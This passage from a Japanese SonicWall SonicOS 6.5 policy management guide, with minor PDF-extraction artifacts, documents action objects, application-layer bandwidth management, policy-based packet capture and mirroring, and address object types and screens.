帯域幅使用率の設定が可能で、 優先順位 2 に設定されています。

帯域幅管理グローバル-中高 受信と送信帯域幅を管理し、 変動可能な値で保証された帯域幅、 および利用可能帯域幅全体の 大 100% までの 大/バース ト帯域幅使用率

の設定が可能で、 優先順位 3 に設定されています。

帯域幅管理グローバル-中 受信と送信帯域幅を管理し、 変動可能な値 (既定は 50%) で保証された

帯域幅、 および利用可能帯域幅全体の 大 100% までの 大/バース ト

帯域幅使用率の設定が可能で、 優先順位 4 に設定されています。

帯域幅管理グローバル-中低 受信と送信帯域幅を管理し、 変動可能な値で保証された帯域幅、 および利用可能帯域幅全体の 大 100% までの 大/バース ト帯域幅使用率

の設定が可能で、 優先順位 5 に設定されています。

帯域幅管理グローバル-低 受信と送信帯域幅を管理し、 変動可能な値 (既定は 20%) で保証された

帯域幅、 および利用可能帯域幅全体の 大 100% までの 大/バース ト

帯域幅使用率の設定が可能で、 優先順位 6 に設定されています。

帯域幅管理グローバル- 低 受信と送信帯域幅を管理し、 変動可能な値で保証された帯域幅、 および利用可能帯域幅全体の 大 100% までの 大/バース ト帯域幅使用率

の設定が可能で、 優先順位 7 に設定されています。

GAV を迂回する ポリシーに一致するト ラフ ィ ックのゲートウェイ アンチウィルス検査を

バイパスします。 この動作は、 ト リガーされた直後から接続期間全体にわたって維持されます。 アプリケーショ ン制御検査用にバイパスされることのない FTP 制御チャンネルに対しては特殊な操作が適用されます。

この動作は、 FTP データ チャンネルの適切な処理をサポート します。

IPS を迂回する ポリシーに一致する ト ラフ ィ ッ クの 侵入防御サービス検査をバイパス

します。 この動作は、 ト リガーされた直後から接続期間全体にわたって維持されます。 アプリケーシ ョ ン制御検査用にバイパスされるこ とのない FTP 制御チャンネルに対しては特殊な操作が適用されます。 こ

の動作は、 FTP データ チャンネルの適切な処理をサポート します。

定義済みの規定の動作オブジェク トについて

動作種別 説明

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定171

ユーザ定義の動作オブジェク トのタイプについてユーザ定義の動作オブジェク ト を作成するために使用できる動作タイプは、 「動作オブジェク トの追加/編集ダイアログ」 に表示されます。 このダイアログは 「オブジェ ク ト > 動作オブジェ ク ト」 ペー

ジの 「追加」 を選択すると表示されます。

動作種別の説明については、 ユーザ定義の動作オブジェク トの動作タイプを参照して ください。

SPY を迂回する ポリシーに一致するト ラフ ィ ックのアンチスパイウェア検査をバイパスします。 この動作は、 ト リガーされた直後から接続期間全体にわたって維持されます。 アプリケーショ ン制御検査用にバイパスされることのない FTP 制御チャンネルに対しては特殊な操作が適用されます。 この動作

は、 FTP データ チャンネルの適切な処理をサポート します。

キャプチャ ATP をバイパス マルウェアではないこ とが確実なフ ァ イルについて Capture AdvancedThreat Protection (ATP) の分析をスキップする場合に使用できます。 こ

の動作は、 ト リガーされた直後から接続期間全体にわたって維持されます。

このオプシ ョ ンを選択しても、 GAV やクラウド アンチウィルスのよう

な他のアンチ脅威コンポーネン トによるファイルの判定はスキップされません。

メモ : 「動作オブジェク トの追加/編集」 ダイアログで動作オブジェ ク ト設定で利用可能なアク

シ ョ ンタイプを使用してユーザ定義の動作オブジェ ク ト を作成できます。 既定の定義済み動作オブジェ ク トは、 編集または削除できません。 ポリシーを作成する場合、 「アプリケーシ ョ ン制御ポリシーの編集」 ダイアログでは、 あらかじめ定義されている動作や定義したカスタマイズ済み動作を選択できます。

ユーザ定義の動作オブジェク トの動作タイプ

動作種別 説明

SMTP 電子メ ールを遮断 -エラー応答の送信

SMTP 電子メールを遮断し、 カスタマイズされたエラー メ ッセージを送

信者に通知します。

電子メール添付ファイルを無効化 - テキストの追加

電子メールの添付フ ァイルを無効にし、 カスタマイズされたテキス トを追加します。

定義済みの規定の動作オブジェク トについて

動作種別 説明

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定172

優先順位 0 の設定は、 高優先順位です。 すべての帯域幅管理レベルに対する保証帯域幅の合計は、

100% を超えることはできません。

帯域幅管理を用いた動作についてアプリケーシ ョ ン層帯域幅管理 (BWM) を利用すると、 プロ ト コル内の特定のファイル タイプに対し

ては帯域幅の消費を制限する一方で、 それ以外のファイル タイプに対しては帯域幅を無制限に使用

するポリシーを作成できます。 これにより、 同じプロ ト コル内で好ましいト ラフ ィ ッ クと好まし く ないト ラフ ィ ッ クを区別できます。 アプリケーシ ョ ン層帯域幅管理は、 すべてのアプリケーシ ョ ン一致や、 HTTP クライアン ト、 HTTP サーバ、 個別、 および FTP ファイル転送の種別を使用する個別アプリ

ケーシ ョ ン ルール ポリシーでサポート されます。 ポリシー種別の詳細については、 アプリケーシ ョ

ン ルール ポリシーの作成について (36 ページ) を参照して ください。

「フ ァイアウォール設定 > 帯域幅管理」 ページの 「帯域幅管理種別」 が 「グローバル」 に設定されて

いる場合、 アプリケーシ ョ ン層帯域幅管理機能は、 「ルール > アプリケーシ ョ ン ルール」 ページから

のポリシーの追加時に使用できる、 定義済みの 8 つの既定の帯域幅管理優先順位レベルによってサ

ポート されます。

電子メール - テキストの追加 電子メールの末尾に個別テキスト を追加します。

FTP 通知の応答 接続を終了せずに FTP 制御チャンネルを介してクライアン トにテキス

ト を返します。

HTTP 遮断ページ 個別 HTTP 遮断ページを設定できます。 色も選択できます。

HTTP リダイレク ト HTTP リダイレク ト機能を提供します。 例えば、 Google ウェブ サイ トに

ユーザをリダイレク トする場合は、 カスタマイズ可能な部分を次のように設定します (http://www.google.com)。 フォームが開いている

ブラウザにアプリケーシ ョ ン制御から HTTP リダイレク トが送信される

と、 フォーム内の情報は失われます。

帯域幅管理 アクセス ルール BWM ポリシー定義と同じセマンテ ィ クスを持つ帯域

幅管理制限を定義できます。

ユーザ定義の動作オブジェク トの動作タイプ

動作種別 説明

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定173

すべてのアプリケーシ ョ ン帯域幅管理は、 「フ ァイアウォール設定 > 帯域幅管理」 ページで設定され

るグローバル帯域幅管理と関連しています。

次の 2 種類の帯域幅管理が利用できます。 詳細およびグローバルです。

• 種別が 「詳細」 に設定されている場合、 帯域幅管理は 「アプリケーシ ョ ン ルール」 に対して個

別に設定できます。

• 種別が 「グローバル」 に設定されている場合、 設定済みの帯域幅管理をすべてのゾーン内のすべてのインターフェースに対してグローバルに適用できます。

ベスト プラクテ ィスとして、 「ファイアウォール設定 > 帯域幅管理」 ページのグローバル帯域幅管理

の設定は、 常にいかなる帯域幅管理ポリシーの設定よりも前に行う必要があります。

「ファイアウォール設定 > 帯域幅管理」 ページの 「帯域幅管理種別」 を 「詳細」 から 「グローバル」 に

変更すると、 すべてのアクセス ルールで帯域幅管理が無効になります。 ただし、 アプリケーシ ョ ン制

御ポリシー内の既定の帯域幅管理動作オブジェク トは、 グローバル帯域幅管理設定に変換されます。

「帯域幅管理種別」 を 「グローバル」 から 「詳細」 に変更すると、 すべてのアプリケーシ ョ ン ルー

ル ポリシーで使用されている既定の帯域幅管理動作は、 変更前にどのよ うなレベルに設定されてい

ても、 「高度な帯域幅管理 - 中」 に自動変換されます。

ト ピック :

• 既定の帯域幅管理動作 (175 ページ)

• 個別帯域幅管理動作 (175 ページ)

• 帯域幅管理方式 (177 ページ)

• 帯域幅管理動作オブジェク ト情報の表示 (177 ページ)

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定174

既定の帯域幅管理動作「詳細」 と 「グローバル」 の切り替えを行う と、 既定の帯域幅管理動作が 「帯域幅管理グローバル -

中」 に変換されます。 動作種別を切り替えても、 ファイアウォールによって以前の優先順位レベルが保存されることはありません。 変換の内容は、 「ルール > アプリケーシ ョ ン ルール」 ページで確認で

きます。

個別帯域幅管理動作個別帯域幅管理動作は既定の帯域幅管理動作と異なる振舞いをします。 個別帯域幅管理動作は、 「オブジェク ト > 動作オブジェク ト」 ページで動作オブジェク ト を作成することで設定されます。 個別帯

域幅管理動作と、 そう した動作を使用するポリシーでは、 「帯域幅管理種別」 が 「グローバル」 と「詳細」 の間で切り替えられるたびに、 それぞれの優先順位設定が保持されます。

帯域幅管理種別がグローバルであるポリシーでの個別帯域幅管理動作の図に、 グローバル帯域幅管理種別が 「グローバル」 に設定された後の同じポリシーを示します。 ツールチップには優先順位のみが表示されています。 これは、 レベル 5 の保証帯域幅または 大帯域幅のグローバル優先順位キューに

値がまった く設定されていないからです。

帯域幅管理種別がグローバルであるポリシーでの個別帯域幅管理動作

「帯域幅管理種別」 が 「グローバル」 に設定されている場合、 「動作オブジェ ク トの追加/編集」 ダ

イアログには、 「帯域幅優先順位」 のオプシ ョ ンが提示されますが、 使用される値は、 「フ ァ イアウォール設定 > 帯域幅管理」 ページにある 「優先順位」 テーブルで 「保証帯域幅」 および 「 大帯域

幅」 について指定されているものです。

帯域幅管理タイプグローバルでのアクシ ョ ンオブジェ ク トの追加/編集ページは、 「フ ァ イアウォー

ル設定 > 帯域幅管理」 ページでグローバル帯域幅管理種別が 「グローバル」 に設定されている状態で

の 「動作オブジェク トの追加/編集」 ダイアログ内の帯域幅優先順位の選択肢を示します。

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定175

帯域幅管理タイプグローバルでのアクシ ョ ンオブジェク トの追加/編集ページ

アプリケーシ ョ ン層の帯域幅管理の設定は、 アクセス ルールの帯域幅管理の設定と同じ方法で処理さ

れます。 どちらもグローバル帯域幅管理設定に関連付けられています。 しかしながら、 アクセス ルー

ルではできないすべての内容種別を指定することが、 アアプリケーション ルールでは可能です。

帯域幅管理の使用事例として、 管理者が就業時間内の .mp3 および実行可能ファイルのダウンロード

を 1Mbps を超えないように制限する場合があります。 同時に、 .doc や .pdf など、 業務との関連性

の高いファイル種別のダウンロードについては、 利用可能な 大帯域幅まで許可し、 場合によっては業務との関連性の高いコンテンツのダウンロードに可能な限り 高の優先順位を与えたい場合もあります。 も う 1 つの例と して、 特定の種別のピアツーピア (P2P) ト ラフ ィ ッ クには帯域幅制限をかける

一方で、 その他の種別の P2P には制限なしの帯域幅を許可したい、 というケースがあります。 アプリ

ケーシ ョ ン層の帯域幅管理により、 これらを実施するポリシーを作成することが可能になります。

多くの帯域幅管理動作オプシ ョ ンも、 あらかじめ定義された既定の動作リストで利用可能です。 この帯域幅管理動作オプシ ョ ンは、 「フ ァイアウォール設定 > 帯域幅管理」 ページの 「帯域幅管理種別」

の設定によって異なります。 「帯域幅管理種別」 が 「グローバル」 に設定されている場合は、 8 つの

優先順位すべてが選択可能です。 「帯域幅管理種別」 が 「詳細」 に設定されている場合は、 どの優先順位も選択できませんが、 ポリシーの追加時には定義済みの優先順位を使用できます。

ポリシーの追加: 事前定義された既定の動作の可用性テーブルに、 ポリシー追加時に利用可能な事前

定義済みの既定の動作を示します。

メモ :設定されているかどうかに関係な く、 すべての優先順位 (リアルタイム~ 低) が表示さ

れます。 どの優先順位が有効かを確認するには、 「フ ァイアウォール設定 > 帯域幅管理」 ペー

ジを参照します。 「帯域幅管理種別」 が 「グローバル」 に設定されていて、 有効になっていない帯域幅優先順位を選択した場合、 ト ラフ ィ ッ クは自動的にレベル 4 の優先順位 (4 (中)) にマッ

プされます。

メモ : すべての帯域幅管理レベルに対する保証帯域幅の合計は、 100% を超えるこ とはできま

せん。

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定176

帯域幅管理方式帯域幅管理機能は、 次の 2 つの方法で実装できます。

帯域幅管理: 実装方法

• ポリシーごとの方法 - ポリシーで指定した帯域幅制限がポリシーごとに個別に適用される

例: 2 つのポリシーがそれぞれ独立して 500 (KB/秒) の制限を受けるとき、 この 2 つのルールに

よる可能な合計の帯域幅は 1000 (KB/秒) となる

• 動作ごとの総計による方法 - 帯域幅制限の動作が適用対象のすべてのポリシーに (共用的に) 適用

される

例: 2 つのポリシーが 500 (KB/秒) の帯域幅管理の制限を共用するとき、 合計の帯域幅は 500 (KB/秒) に制限される

帯域幅管理動作オブジェク ト情報の表示帯域幅管理動作オブジェク トに関する情報を表示するには、 「コンテンツ」 列の動作オブジェク トの「じ ょ うご」 アイコン上にマウスを移動します。 「帯域幅管理」 ポップアップ ツール チップが表示

されます。

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定177

動作オブジェク トの作成SonicOS には、 規定のあらかじめ定義されている動作オブジェ ク トがあります。 これらについては、

システム定義済みの規定の動作オブジェク トについて (169 ページ) に記載されています。 これらの動

作オブジェク トは、 変更や削除ができません。

あらかじめ定義された動作を使用しない場合は、 新しい動作オブジェク ト を設定します。 以下に示す「動作オブジェク トの設定」 ダイアログでは、 設定可能な動作をテキストまたは URL を使用してカス

タマイズできます。 「動作」 ド ロ ップダウン リス ト で使用可能な動作タイプを選択できます。 あら

かじめ定義された動作に加え、 これまでに作成した設定可能な動作も、 アプリケーシ ョ ン ルール ポリシーの作成時に選択肢として表示されます。

動作オブジェク ト を設定するには:

1 管理ビューで、 「ポリシー | オブジェク ト > 動作オブジェク ト」 に移動します。

2 ページの上部にある 「 追加」 を選択します。

3 「A 動作オブジェク トの追加/編集」 ダイアログの 「動作名」 フ ィールドで、 わかりやすい動作

名を入力します。

4 「動作」 ドロップダウン メニューで、 目的の動作タイプを選択します。

5 「内容」 フ ィールドに、 動作で使用するテキストまたは URL を入力します。

6 「HTTP 遮断ページ」 を動作タイプと して選択すると、 オプシ ョ ン項目が変わります。

a 「内容」 フ ィールドに、 ページが遮断された場合に表示する内容を入力します。

b 「色」 ドロップダウン メニューから遮断ページの背景色を選択します。

• 白

• 黄色

• 赤

• 青色

c 遮断ページ メ ッセージのプレビューを表示するには、 「プレビュー」 ボタンを選択し

ます。

7 「帯域幅管理」 を動作タイプと して選択すると、 オプシ ョ ン項目が変わります。 これらのオプシ ョ ンを設定するには、 『SonicOS セキュ リテ ィ設定』 技術ドキュ メン トの 「フ ァイアウォー

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定178

ル設定 > 帯域幅管理」 セクシ ョ ンの 「動作オブジェク ト」 の帯域幅オブジェク トの有効化を参

照して ください。

8 「OK」 を選択します。

動作オブジェク トの変更ユーザが設定した個別動作オブジェク トは変更することができます。 システム定義済みの既定の動作オブジェク トは変更できません。

動作オブジェク ト を変更するには:

1 管理ビューで、 「ポリシー | オブジェク ト > 動作オブジェク ト」 に移動します。

2 変更するオブジェク トの編集アイコンを選択します。 「動作オブジェク トの設定」 ダイアログが表示されます。

3 動作オブジェク トの作成 (178 ページ) の手順 3 から手順 8 を実行します。

パケッ ト監視を使用したアクシ ョ ンの関連タスク事前定義済みのパケッ ト監視動作がポリシーに対して選択されている場合、 SonicOS は 「ツール > パケッ ト監視」 ページの 「調査」 上で構成した設定に応じてト ラフ ィ ッ クをキャプチャまたはミ ラーします。 既定では、 Wireshark™ で参照可能なキャプチャ フ ァ イルを作成します。 Wireshark について

は、 Wireshark (46 ページ) を参照して ください。

パケッ ト監視動作を用いてポリシーを設定して後、 実際にパケッ ト をキャプチャするために、 「パケッ ト監視」 ページで 「キャプチャの開始」 を選択する必要があります。 欲しいパケッ ト をキャプチャした後で、 「ミ ラーの停止」 を選択します。

ト ピック :

• ポリシーに関連するパケッ トのキャプチャ (179 ページ)

• ミ ラーリングの設定 (180 ページ)

ポリシーに関連するパケッ トのキャプチャ

ポリシーに関連するパケッ トのみをキャプチャするようにパケッ ト監視動作を制御するには、 以下の手順に従います。

1 「調査」 ビューで、 「ツール | パケッ ト モニタ」 ページを開きます。

2 「設定」 ボタンをクリ ッ クします。 「パケッ ト監視の設定」 ダイアログが表示されます。

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定179

3 「監視フ ィルタ」 を選択します。

4 「フ ァイアウォール/アプリケーシ ョン ルールによるフ ィルタを有効にする」 を選択します。 こ

のオプシ ョ ンは、 既定では選択されていません。

このモー ド では、 「パケ ッ ト 監視」 ページで 「キャプチャの開始」 を選択した後で、 ト ラフ ィ ッ クがアプリケーシ ョ ン制御ポリシー (またはアクセス ルール) を始動させるまではパケッ

トはキャプチャされません。 ポリシーが始動される際には、 「ログ > イベン ト ログ」 ページの

「調査」 ビューで警告メ ッセージを確認できます。

これは、 パケッ ト モニタの動作タイプを持つアクシ ョ ン オブジェク ト、 またはパケッ ト モニ

タを使用する 「ルール > アクセス ルール」 で作成されたポリシーを使用して作成されたアプリ

ケーシ ョ ン ルール ポリシーで機能し、 キャプチャまたはミ ラーリング対象の設定またはフ ィ

ルタ リングを指定できます。 例えば、 キャプチャを異なる形式でダウンロード して、 ブラウザ内で参照できます。

5 「OK」 を選択します。

ミ ラーリングの設定

ミ ラーリングを設定するには、 以下の手順に従います。

1 「調査」 ビューで、 「ツール | パケッ ト モニタ」 ページを開きます。

2 「設定」 ボタンをクリ ッ クします。 「パケッ ト監視の設定」 ダイアログが表示されます。

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定180

3 「ミ ラー」 を選択します。

4 「ローカル ミ ラー設定」 の下の 「フ ィルタ されたパケッ ト をインターフェースにミ ラーする」

ドロップダウン メニューからでミ ラーされたパケッ ト を送信する先のインターフェースを選択

します。

5 また、 リモート設定のうち 1 つを設定できます。 これにより、 アプリケーション パケッ トを別の

コンピュータにミ ラーしてすべてをハードディスク上に保存することが可能です。 例えば、 MSNインスタン ト メ ッセンジャー ト ラフ ィ ックをキャプチャして会話を読むことができます。

6 「OK」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定181

7

アドレス オブジェク トの設定

• オブジェク ト > アドレスオブジェク ト (182 ページ)

• アドレス オブジェク トの種別 (183 ページ)

• アドレス グループについて (184 ページ)

• 「オブジェク トについて > アドレス オブジェク ト」 ページ (184 ページ)

• 既定のアドレス オブジェク トおよびアドレス グループ (188 ページ)

• 既定の Pref64 アドレス オブジェク ト (189 ページ)

• アドレス オブジェク トの追加 (189 ページ)

• アドレス オブジェク トの編集 (191 ページ)

• ユーザ定義アドレス オブジェク トの削除 (191 ページ)

• MAC または FQDN アドレス オブジェク トの消去 (192 ページ)

• アドレス グループの作成 (192 ページ)

• 動的アドレス オブジェク トの使用 (194 ページ)

オブジェク ト > アドレスオブジェク トアドレス オブジェク ト を使用することで、 1 度定義したエンテ ィテ ィ を SonicOS インターフェース全

体の複数の参照インスタンスで再利用するこ とができます。 アド レス オブジェ ク トの作成は単に IPアドレスを入力するよりも手間がかかりますが、 アドレス オブジェク トは SonicOS の管理機構を補完

する目的で実装されており、 それによって以下の特徴が実現されています。

• ゾーンの関連付け - ホスト、 MAC、 および FQDN のアドレス オブジェク ト を定義する際は、 明

示的にゾーンを指定する必要があります。 インターフ ェースのほとんどの領域 (アクセス ルー

ルなど) では、 指定されたゾーンは参照のためにしか使われません。 指定されたゾーンが機能

上の目的で使用されるのは、 「アド レス オブジェ ク ト」 ド ロ ップダウン リス トの項目をコン

テキストに合わせて正確に表示するために利用される場合と、 ユーザおよびグループに割り当てる VPN アクセスを定義する場合です。 アドレス オブジェ ク ト を使用して VPN アクセスを定

義する際には、 アクセス ルール自動作成プロセスによってアドレス オブジェ ク トのゾーンが

参照され、 そのルールを割り当てるべき VPN [ゾーン] の共通部分が適切に決定されます。 例え

ば、 LAN ゾーンに属する 192.168.168.200 Host というホス ト ア ド レス オブジェ ク トが TrustedUsers ユーザ グループの VPN アクセスに追加された場合、 自動的に作成されるアクセス ルール

は VPN LAN ゾーンに割り当てられます。

• 管理と処理 - 多用途の種別に属するアドレス オブジェク ト群は SonicOS インターフェース全域

で簡単に使用できるため、 (アクセス ルールを定義する場合など) 処理の定義や管理を素早く行

う ことができます。 また、 アドレス グループのメンバーは単純な操作によって簡単に追加また

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定182

は削除できるので、 それを参照するルールやポリシーを直接操作する必要なしに、 ルールやポリシーの内容を効率的に変更することができます。

• 再利用性 - オブジェク ト を定義する必要があるのは一度だけで、 定義したオブジェク トは必要

に応じて何度でも容易に参照できます。

例えば、 IP アドレスが 67.115.118.80 の内部ウェブ サーバがあるとします。 アクセス ロールや NATポリシーを作成する際に IP アドレスを繰り返し入力するのではな く、 アド レス オブジェ ク ト を使用

して、 例えばマイ ウェブ サーバという 1 つのエンテ ィテ ィ を IP アドレス 67.115.118.80 のホスト

アドレス オブジェク ト と して作成します。 このマイ ウェブ サーバアドレス オブジェク トは、 アドレ

ス オブジェ ク ト を定義条件と して使用する任意の設定画面で、 ドロップダウン メニューから簡単に

選択できます。

ト ピッ ク :

• アドレス オブジェク トの種別 (183 ページ)

• アドレス グループについて (184 ページ)

• 「オブジェク トについて > アドレス オブジェク ト」 ページ (184 ページ)

• 既定のアドレス オブジェク トおよびアドレス グループ (188 ページ)

• 既定の Pref64 アドレス オブジェク ト (189 ページ)

• アドレス オブジェク トの追加 (189 ページ)

• アドレス オブジェク トの編集 (191 ページ)

• ユーザ定義アドレス オブジェク トの削除 (191 ページ)

• MAC または FQDN アドレス オブジェク トの消去 (192 ページ)

• アドレス グループの作成 (192 ページ)

• 動的アドレス オブジェク トの使用 (194 ページ)

アドレス オブジェク トの種別ネッ トワーク アドレスの表現にはさまざまな種類があるため、 アドレス オブジェ ク ト種別テーブル

に示す複数のアドレス オブジェク ト種別が用意されています。

アドレス オブジェク ト種別

種別 定義

ホスト IP ア ド レスとゾーン関連によって 1 つのホス ト を定義します。 ホス ト ア ド レス オブ

ジェク トのサブネッ ト マスクは、 単独のホス ト を識別できるように自動的に 32 ビッ ト

(255.255.255.255) に設定されます。 例えば、 My Web Server の IP アドレスは 67.115.118.110 であり、 既定のネッ トマスクは 255.255.255.255 です。

範囲 連続する IP アドレスの範囲を定義します。 範囲アドレス オブジェ ク トにはサブネッ ト

マスクは関連付けられませんが、 内部ロジッ クでは通常、 指定範囲の各アド レスは 32ビ ッ ト でマスク されたホス ト オブジ ェ ク ト と し て扱われます。 例えば、 My PublicServers の開始 IP アドレスは 67.115.118.66、 終了 IP アドレスは 67.115.118.90 です。 この範囲内の 25 個の個々のホス トアドレスはすべてこのアドレス オブジェク トに

含まれます。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定183

アドレス グループについてSonicOS には、 アドレス オブジェク ト と他のアドレス グループをアドレス グループにグループ化する

機能があります。 アド レス グループを定義するこ とで、 参照の効率を向上させるこ とができます。

アドレス グループは、 ホス ト アドレス オブジェク ト、 範囲アドレス オブジェク ト、 ネッ トワーク アドレス オブジェク ト を任意に組み合わせて構成できます。 例えば、 マイ公開グループ にはホス ト アドレス オブジェク トであるマイ ウェブ サーバ と、 範囲アドレス オブジェク トであるマイ公開サーバ

を含められるので、 実質的に IP アド レス 67.115.118.66~67.115.118.90、 および IP アド レス

67.115.118.110 を表すことができます。

動的アドレス オブジェク ト (MAC および FQDN) は別にグループ化する必要がありますが、 IP ベースの

アドレス オブジェク トのグループに MAC アドレス オブジェク ト を追加すること自体は安全です。 IPアドレス オブジェク トのグループに追加された MAC アドレス オブジェク トは、 処理のコンテキスト

においてその参照が無意味なとき (NAT ポリシーの場合など) には無視されます。

「オブジェク トについて > アドレス オブジェク

ト」 ページ「オブジェク ト > アドレス オブジェク ト」 ページには 2 つの画面があります。

• アドレス オブジェク ト画面 (185 ページ)

ネッ トワーク

複数のホスト を構成するという点で範囲オブジェク ト と似ていますが、 アドレスの上限と下限を指定するのではな く、 有効なサブネッ ト マスクによってアドレスの境界を定義

します。 ネッ トワーク アドレス オブジェク トは、 ネッ トワークのアドレスとそれに対応

するサブネッ ト マスクによって定義する必要があります。 例えば、 ネッ トワーク値が

67.115.118.64、 サブネッ ト マスクが 255.255.255.224 のマイ公開ネッ トワークの

アドレスは、 67.115.118.64~67.115.118.95 になります。 一般的なルールとして、

ネッ トワークの 初のアドレス (ネッ トワーク アドレス) およびネッ トワークの 後のア

ドレス (ブロードキャスト アドレス) はホストに割り当てることはできません。

MAC ハードウェア アドレスまたは IPv4/IPv6 MAC (メディア アクセス コン ト ロール) アドレス

によってホス ト を識別できます。 MAC アド レスは、 ハードウェアの製造元によって有

線または無線のすべてのネッ トワーク機器に個別に割り当てられており、 変更できないようになっています。 MAC アドレスは、 6 バイ ト 16 進数形式で表記される 48 ビッ ト値

です。 例えば、 My Access Point の MAC アドレスは 00:06:01:AB:02:CD です。 MAC アドレスは、 セキュリテ ィ装置の ARP キャッシュを参照することにより、 IP アドレスに解

決されます。 MAC アドレス オブジェク トは、 SonicPoint や SonicWave ID などの SonicOS の無線構成のさまざまなコンポーネン トによって使用され、 無線スキャン中に検出された無線アクセス ポイン トの BSSID (Basic Service Set Identifier または WLAN MAC) を認証しま

す。 MAC アドレス オブジェ ク ト を使用して、 ホス トがゲス トサービス認証をバイパス

できるようにすることもできます。

FQDN 例えば www.sonicwall.com など、 ホス トの IPv4/IPv6 による完全修飾ド メイン名 (FQDN) を使ってホス ト を識別できます。 FQDN は、 セキュ リテ ィ装置の設定で指定されている

DNS サーバを使用して IP アド レスに解決されます。 ワイルド カード エン ト リは、 DNSサーバに送信されたクエリに対する応答によってサポート されます。

アドレス オブジェク ト種別

種別 定義

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定184

• アドレス グループ画面 (185 ページ)

この 2 つの画面は似ており、 同じような機能を備えていますが、 い くつかの違いがあります。

このページで使用できる機能については、 以下を参照して ください。

• 共通の機能 (186 ページ)

• エン ト リの並べ替え (188 ページ)

アドレス オブジェク ト画面

アドレス グループ画面

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定185

共通の機能それぞれの画面には次のような共通の機能があり、 テーブルには同じ列見出しがあります。

それぞれのテーブルの下部には、 テーブル内のエン ト リ数が表示されます。

ト ピック :

• 共通の機能 (186 ページ)

• 共通の列見出し (187 ページ)

共通の機能

• 追加 - アドレス オブジェク トまたはアドレス グループを追加する場合に選択します。

• 削除 - 「選択の削除」 を選択して選択したユーザ定義エン ト リを削除するか、 「すべて削除」

選択してすべてのユーザ定義エン ト リをテーブルから削除します。 既定のエン ト リは削除できません。

• 検索 - 検索文字列を入力すると、 その文字列を含むエン ト リのみが表示されます。 検索文字列

の大文字と小文字は区別されます。 フ ィールド内の X を選択して検索フ ィルタを削除し、 前の

画面に戻ります。

• 表示 - IPv4 エン ト リだけを表示するには 「IPv4」 、 IPv6 エン ト リのみを表示するには 「IPv6」 、

すべてのエン ト リを表示するには 「IPv4 および IPv6」 を選択します。

• 表示 - 「既定」 を選択してシステムで作成された既定のエン ト リのみを表示するか、 「ユーザ定

義」 を選択してユーザ定義エン ト リのみを表示するか、 あるいは 「すべての種別」 を選択してすべてのエン ト リを表示します。

• 再表示アイコン - アイコンを選択すると、 テーブルの表示が更新されます。

• 解決策 (およびアイコン) - 「解決」 を選択して 1 つまたは複数の MAC または FQDN エン ト リで

解決を実行するか、 「すべて解決」 を選択してテーブル内のすべての MAC または FQDN エン ト

リを解決します。 詳細については、 動的アドレス オブジェク ト : 機能と利点テーブルを参照し

て ください。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定186

• 消去 (およびアイコン) - 「消去」 を選択して、 選択した MAC または FQDN アドレス オブジェク

トから期限切れの情報を削除するか、 「すべて消去」 を選択してすべての MAC エン ト リまた

は FQDN エン ト リの 新情報を削除します。 MAC アド レス オブジェ ク トの場合は ARP 情報、

FQDN アドレス オブジェク トの場合は DNS TTL 値です。

共通の列見出し

• チェ ックボックス - 選択して個別エン ト リを選択します。

• # - テーブル内のエン ト リの番号。 この番号は、 列を降順と昇順のどちらで並べ替えるかに応じ

て変化します。 「アドレス グループ」 画面には、 そのグループのエン ト リを展開または折りた

たむことができる小さな三角形が表示されます。

• 名前 - アドレス オブジェ ク トまたはアドレス グループ エン ト リの一意の名前。 アドレス グループ エン ト リが展開されている場合、 この列に次の情報が表示されます。

• アドレス グループの各メンバーの一意の名前。

• アドレス グループにメンバーがない場合は、 「登録がありません」 という文字列。

• 詳細 - アドレス オブジェク トの詳細として該当するアドレスやマスクが表示されます。 アドレ

ス グループ エン ト リでは、 この列は空白になります。 ただし、 エン ト リ を展開すると、 グ

ループのメンバーの詳細が表示されます。

• 種別 - 「ホスト、 ネッ トワーク、 範囲、 MAC アドレス、 FQDN」 など、 アドレス オブジェク トの

種別が表示されます。 アドレス グループでは、 種別は 「グループ」 です。 エン ト リを展開する

と、 各メンバーの種別が表示されます。

• IP バージョン - アドレス オブジェク トまたはアドレス グループのメンバーの IP バージョン(IPv4、IPv6、 または混在)が表示されます。

• ゾーン - アドレス オブジェク トまたはアドレス グループのメンバーに割り当てられたゾーンが

ある場合は表示されます。

• クラス - アドレス オブジェク トまたはアドレス グループが既定 (システム定義) か個別 (ユーザ

定義) かが表示されます。

• コ メン ト - コ メン ト アイコンの上をマウスでポイン トすると、 エン ト リに関する次のような詳

細を示すポップアップ情報が表示されます。

• アドレス オブジェク ト - 以下の情報が表示されます。

• アドレス オブジェク トの名前

• 参照元: - アドレス オブジェク トの参照元と、 参照された回数。 参照されたことの

ないアドレス オブジェク トの場合は、 このセクシ ョ ンに 「リス トなし」 と表示さ

れます。

メモ :既定のアドレス オブジェク ト と既定のアドレス グループは削除できません。

SonicWall SonicOS 6.5 ポリシー管理

アドレス オブジェク トの設定187

• グループ (所属先): - アドレス オブジェク トが所属するグループのリス ト。 グルー

プに所属していないアドレス オブジェク トの場合は、 このセクシ ョ ンに 「リス ト

なし」 と表示されます。

• アドレス グループ - 以下の情報が表示されます。

• アドレス グループの名前

• 参照元: - アドレス グループの参照元と、 参照された回数。 参照されたことのない

アドレス グループの場合は、 このセクシ ョ ンに 「リス トなし」 と表示されます。

• グループ (所属先): - アドレス グループが所属するグループのリスト。 グループに

所属していないアドレス グループの場合は、 このセクシ ョ ンに 「リス トなし」 と

表示されます。

• メンバー: - このグループに所属するアドレス オブジェク トのリスト。 メンバーがな

